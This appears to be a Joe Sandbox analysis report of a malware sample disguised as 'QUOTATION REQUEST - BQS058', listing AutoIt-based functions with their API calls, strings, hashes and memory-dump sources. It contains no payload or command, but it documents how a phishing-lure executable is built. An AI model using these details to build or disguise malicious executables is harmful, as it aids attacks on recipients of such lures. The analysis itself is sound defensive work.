Instruction ID: d4ef04e444600d31430e827141073362f5d4344bec72871803f5d368b96d4529
Opcode Fuzzy Hash: 06728eb459f1bf4c405859fe1a86f5d701bfe798d7f452ecf576333037d0e4f9
Instruction Fuzzy Hash: 14928171508381CFD720DF15C480B2AB7E1BF85314F14896DE98A9B362DBB9EC85DB92

Function 0103445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0100E398), ref: 0103446A
FindFirstFileW.KERNELBASE(?,?), ref: 0103447B
FindClose.KERNEL32(00000000), ref: 0103448B

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: f30c25717d1d5a2085d3f5ed017963f1d12342bb10c981a999029add2627063e
Instruction ID: dc6cb4684833e28dfced3612052178071a7ed13dedc1eaedb3afa5f8915472b8
Opcode Fuzzy Hash: f30c25717d1d5a2085d3f5ed017963f1d12342bb10c981a999029add2627063e
Instruction Fuzzy Hash: 77E0DF72810A026B9320AA38EC0D8EB779C9E45275F104766F9B5C20D0EFBD99008796

Function 00FDE6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 01013E62

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 0a3935b2b55b1acdd72fb150b3ff6e7e240489276483c73912902fb37e42add2
Instruction ID: b948b917cc9ad034b5c71f5d1ee7a835e2491186ea4ffbc4f82e5c404dfbc5b8
Opcode Fuzzy Hash: 0a3935b2b55b1acdd72fb150b3ff6e7e240489276483c73912902fb37e42add2
Instruction Fuzzy Hash: BEA29B75E00205CBCB24EF58C490AAEB7B2FF58324F68805AD9469F355D739ED42EB90

Function 00FE09D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FE0A5B
timeGetTime.WINMM ref: 00FE0D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FE0E53
Sleep.KERNEL32(0000000A), ref: 00FE0E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00FE0EFA
DestroyWindow.USER32 ref: 00FE0F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FE0F20
Sleep.KERNEL32(0000000A,?,?), ref: 01014E83
TranslateMessage.USER32(?), ref: 01015C60
DispatchMessageW.USER32(?), ref: 01015C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 01015C82

Strings

@COM_EVENTOBJ, xrefs: 010154F0
@TRAY_ID, xrefs: 0101578F
@GUI_WINHANDLE, xrefs: 01014F8F
@GUI_CTRLHANDLE, xrefs: 01014FE4
@GUI_CTRLID, xrefs: 01014F3A

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: 5f12ccd9b0668133f8a9e7b83020982501290ff85484419f90a5eb88f7303c68
Instruction ID: 1ae15566a6c1ea9762429854e80890b35ec507f061f322d0fbd0c60251f75ae5
Opcode Fuzzy Hash: 5f12ccd9b0668133f8a9e7b83020982501290ff85484419f90a5eb88f7303c68
Instruction Fuzzy Hash: 0CB2D170608381DFD724DF24C894BAEBBE5BF85304F14495DE5C99B291CBB9E884DB82

Function 01039155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01038F5F: __time64.LIBCMT ref: 01038F69

Part of subcall function 00FD4EE5: _fseek.LIBCMT ref: 00FD4EFD

__wsplitpath.LIBCMT ref: 01039234

Part of subcall function 00FF40FB: __wsplitpath_helper.LIBCMT ref: 00FF413B

_wcscpy.LIBCMT ref: 01039247
_wcscat.LIBCMT ref: 0103925A
__wsplitpath.LIBCMT ref: 0103927F
_wcscat.LIBCMT ref: 01039295
_wcscat.LIBCMT ref: 010392A8

Part of subcall function 01038FA5: _memmove.LIBCMT ref: 01038FDE
Part of subcall function 01038FA5: _memmove.LIBCMT ref: 01038FED

_wcscmp.LIBCMT ref: 010391EF

Part of subcall function 01039734: _wcscmp.LIBCMT ref: 01039824
Part of subcall function 01039734: _wcscmp.LIBCMT ref: 01039837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 01039452
_wcsncpy.LIBCMT ref: 010394C5
DeleteFileW.KERNEL32(?,?), ref: 010394FB
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01039511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01039522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01039534

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: f3b7089b1d67d1556e6c72fa0f6860cd6020d406a92ce64f23b1faea0e701cc4
Instruction ID: aa643aa1bb2c14bdb31f61d6b6893dc32d034dba78d89291f2a4865899266365
Opcode Fuzzy Hash: f3b7089b1d67d1556e6c72fa0f6860cd6020d406a92ce64f23b1faea0e701cc4
Instruction Fuzzy Hash: C7C15CB1D00219ABDF21DF94CC81EDEB7BDEF85304F0040A6E649E7251DB749A849F61

Function 00FD301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00FD3074
RegisterClassExW.USER32(00000030), ref: 00FD309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FD30AF
InitCommonControlsEx.COMCTL32(?), ref: 00FD30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FD30DC
LoadIconW.USER32(000000A9), ref: 00FD30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FD3101

Strings

0, xrefs: 00FD3056
AutoIt v3 GUI, xrefs: 00FD3090
+, xrefs: 00FD305D
TaskbarCreated, xrefs: 00FD30A4

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: adb9a834dd50ac7d0085b2eb5120d451db634935ebed43fef0a79379170e7a2d
Instruction ID: adbee94d18123be68466955790aa220218cdc00e8aaee33b4d032ea9b8474820
Opcode Fuzzy Hash: adb9a834dd50ac7d0085b2eb5120d451db634935ebed43fef0a79379170e7a2d
Instruction Fuzzy Hash: 2C3129B184130AAFDB618FA5D859ADEBBF4FB09310F14415AF580EA294D3BE0545CF51

Function 00FD3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00FD3074
RegisterClassExW.USER32(00000030), ref: 00FD309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FD30AF
InitCommonControlsEx.COMCTL32(?), ref: 00FD30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FD30DC
LoadIconW.USER32(000000A9), ref: 00FD30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FD3101

Strings

0, xrefs: 00FD3056
AutoIt v3 GUI, xrefs: 00FD3090
+, xrefs: 00FD305D
TaskbarCreated, xrefs: 00FD30A4

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: ecf1f39854125277f1cba3586cabc86e1ad7185b73ba197e36e5d116f5c8271c
Instruction ID: 10b8eb8acc8ca9caaeb9ef188132feacdf9591571d31db7c881b075746acef0a
Opcode Fuzzy Hash: ecf1f39854125277f1cba3586cabc86e1ad7185b73ba197e36e5d116f5c8271c
Instruction Fuzzy Hash: CC21F2B1901309AFDB21DFA5E888BDEBBF4FB08700F04411AF990EA284D7BA4544CF91

Function 00FD708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FD4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010952F8,?,00FD37AE,?), ref: 00FD4724

Part of subcall function 00FF050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00FD7165), ref: 00FF052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FD71A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0100E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0100E909
RegCloseKey.ADVAPI32(?), ref: 0100E947
_wcscat.LIBCMT ref: 0100E9A0

Strings

\, xrefs: 0100E9C3
\Include\, xrefs: 00FD7165
Software\AutoIt v3\AutoIt, xrefs: 00FD719E
Include, xrefs: 0100E8BF, 0100E900

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 0656a0a0c1b564054ade4b17e357ede125f14b95369628bffc6ac417611f334d
Instruction ID: 6cd8318e04387cb538c39430f91f7e35840444153a8ae3f224258e18b0ab982c
Opcode Fuzzy Hash: 0656a0a0c1b564054ade4b17e357ede125f14b95369628bffc6ac417611f334d
Instruction Fuzzy Hash: 4F71BE714083019ED314EF69EC618AFBBE8FF84350F44096EF5C5972A0EB7A9948DB52

Function 00FD3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00FD3A50
LoadCursorW.USER32(00000000,00007F00), ref: 00FD3A5F
LoadIconW.USER32(00000063), ref: 00FD3A76
LoadIconW.USER32(000000A4), ref: 00FD3A88
LoadIconW.USER32(000000A2), ref: 00FD3A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FD3AC0
RegisterClassExW.USER32(?), ref: 00FD3B16

Part of subcall function 00FD3041: GetSysColorBrush.USER32(0000000F), ref: 00FD3074
Part of subcall function 00FD3041: RegisterClassExW.USER32(00000030), ref: 00FD309E
Part of subcall function 00FD3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FD30AF
Part of subcall function 00FD3041: InitCommonControlsEx.COMCTL32(?), ref: 00FD30CC
Part of subcall function 00FD3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FD30DC
Part of subcall function 00FD3041: LoadIconW.USER32(000000A9), ref: 00FD30F2
Part of subcall function 00FD3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FD3101

Strings

0, xrefs: 00FD3AF4
AutoIt v3, xrefs: 00FD3B05
#, xrefs: 00FD3AFB

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 9eb80fa1da52ce6de9ae5d536c52a551254c9960e326981edcce62548b55ffa3
Instruction ID: 22bcbe252727479a2c12996d996a1519d05a1cf344d441912e16720444f252bf
Opcode Fuzzy Hash: 9eb80fa1da52ce6de9ae5d536c52a551254c9960e326981edcce62548b55ffa3
Instruction Fuzzy Hash: E6216870D00308AFEB22DFA5EC19B9E7BB1FB09711F00019AF680A6295D3BE56409F90

Function 00FD3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00FD36D2
KillTimer.USER32(?,00000001), ref: 00FD36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FD371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FD372A
CreatePopupMenu.USER32 ref: 00FD373E
PostQuitMessage.USER32(00000000), ref: 00FD374D

Strings

TaskbarCreated, xrefs: 00FD3725

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 00b95105aa76c1dfb7d0406ed1ec520e9b0c844e7ea10ffd3e60acd0bda8876b
Instruction ID: 215d76d17c7acd69c776c18bcc1fd7f7384f6d4696dc200abdbcae627cb625c2
Opcode Fuzzy Hash: 00b95105aa76c1dfb7d0406ed1ec520e9b0c844e7ea10ffd3e60acd0bda8876b
Instruction Fuzzy Hash: 68411A73504506BBEB21AFA9DC19F7A3B96FB01310F180117F781963D5CA7A9A40B763

Function 00FD3766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3ExecuteLine, xrefs: 00FD38A7
CMDLINERAW, xrefs: 00FD37FB
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00FD37AE
CMDLINE, xrefs: 00FD3822
/ErrorStdOut, xrefs: 00FD387D
/AutoIt3ExecuteScript, xrefs: 00FD38BC
/AutoIt3OutputDebug, xrefs: 00FD3892

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: bbb07b932b832f403ee2950918f768ad0282883573a07d38d729aa8dedecde87
Instruction ID: 16e171579446a9648f85f7fdd5ea1bb0ac2c8d0e4b3d1f40a084d66fab06581d
Opcode Fuzzy Hash: bbb07b932b832f403ee2950918f768ad0282883573a07d38d729aa8dedecde87
Instruction Fuzzy Hash: CBA18E7290021D9ADF05EBE4DC51AEEB77ABF15300F48001BF551B7291EF789A08EB61

Function 015F8CA8 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 015F8CED

Memory Dump Source

Source File: 00000000.00000002.2096794282.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15f8000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: 596de8989047629d4aa3ac8563c066436f26da131b75cf5da70e4380a5786263
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: CE51D775A50208BBEB24DFA4CC59FDE77B8BF48701F108958F71AEE180DA749A448B64

Function 00FD39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FD3A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FD3A24
ShowWindow.USER32(00000000,?,?), ref: 00FD3A38
ShowWindow.USER32(00000000,?,?), ref: 00FD3A41

Strings

edit, xrefs: 00FD3A1E
AutoIt v3, xrefs: 00FD39FB, 00FD3A00, 00FD3A01

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: c1e0d34e2e3e843772a4b0220868379cc416c52813169784af84daf0acb305ae
Instruction ID: 51321c616cf9d3810b4b106fee73c371097a5760ae665530d0f76bc7e8c81661
Opcode Fuzzy Hash: c1e0d34e2e3e843772a4b0220868379cc416c52813169784af84daf0acb305ae
Instruction Fuzzy Hash: A8F03A705002947EEB325623AC18E2B2E7DF7CBF50B00005EB940E2194C26A1800CBB0

Function 00FD407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0100D3D7

Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06

_memset.LIBCMT ref: 00FD40FC
_wcscpy.LIBCMT ref: 00FD4150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FD4160

Strings

Line: , xrefs: 0100D400

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: d6caaaa38726727d4af332da210ad00d0414446a130733cca013362f6a3e6a5d
Instruction ID: 58226cc73921883e485d19b397d9faa0a7a386fc1273ae0e478b780d7fca27a0
Opcode Fuzzy Hash: d6caaaa38726727d4af332da210ad00d0414446a130733cca013362f6a3e6a5d
Instruction Fuzzy Hash: 2C31D071008304AFD732EB60DC49BEB77E9AF44310F18451FF6C596291EB79A648D792

Function 00FF541D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00FF547B
_memcpy_s.LIBCMT ref: 00FF54ED
__read_nolock.LIBCMT ref: 00FF554B
__filbuf.LIBCMT ref: 00FF556E
_memset.LIBCMT ref: 00FF55B2

Part of subcall function 00FF8B28: __getptd_noexit.LIBCMT ref: 00FF8B28

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction ID: 8e3c53bc85051513789cc705c6555c96c264506bc80d1104c20213b8254d779e
Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction Fuzzy Hash: D151A671E00B0D9BDB24CEA9DC4067E77A2AF40B35F2C8629FB25962E0D7709D51AB40

Function 00FD686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FD4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FD4E0F

_free.LIBCMT ref: 0100E263
_free.LIBCMT ref: 0100E2AA

Part of subcall function 00FD6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FD6BAD

Strings

Bad directive syntax error, xrefs: 0100E292
>>>AUTOIT SCRIPT<<<, xrefs: 0100E039

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
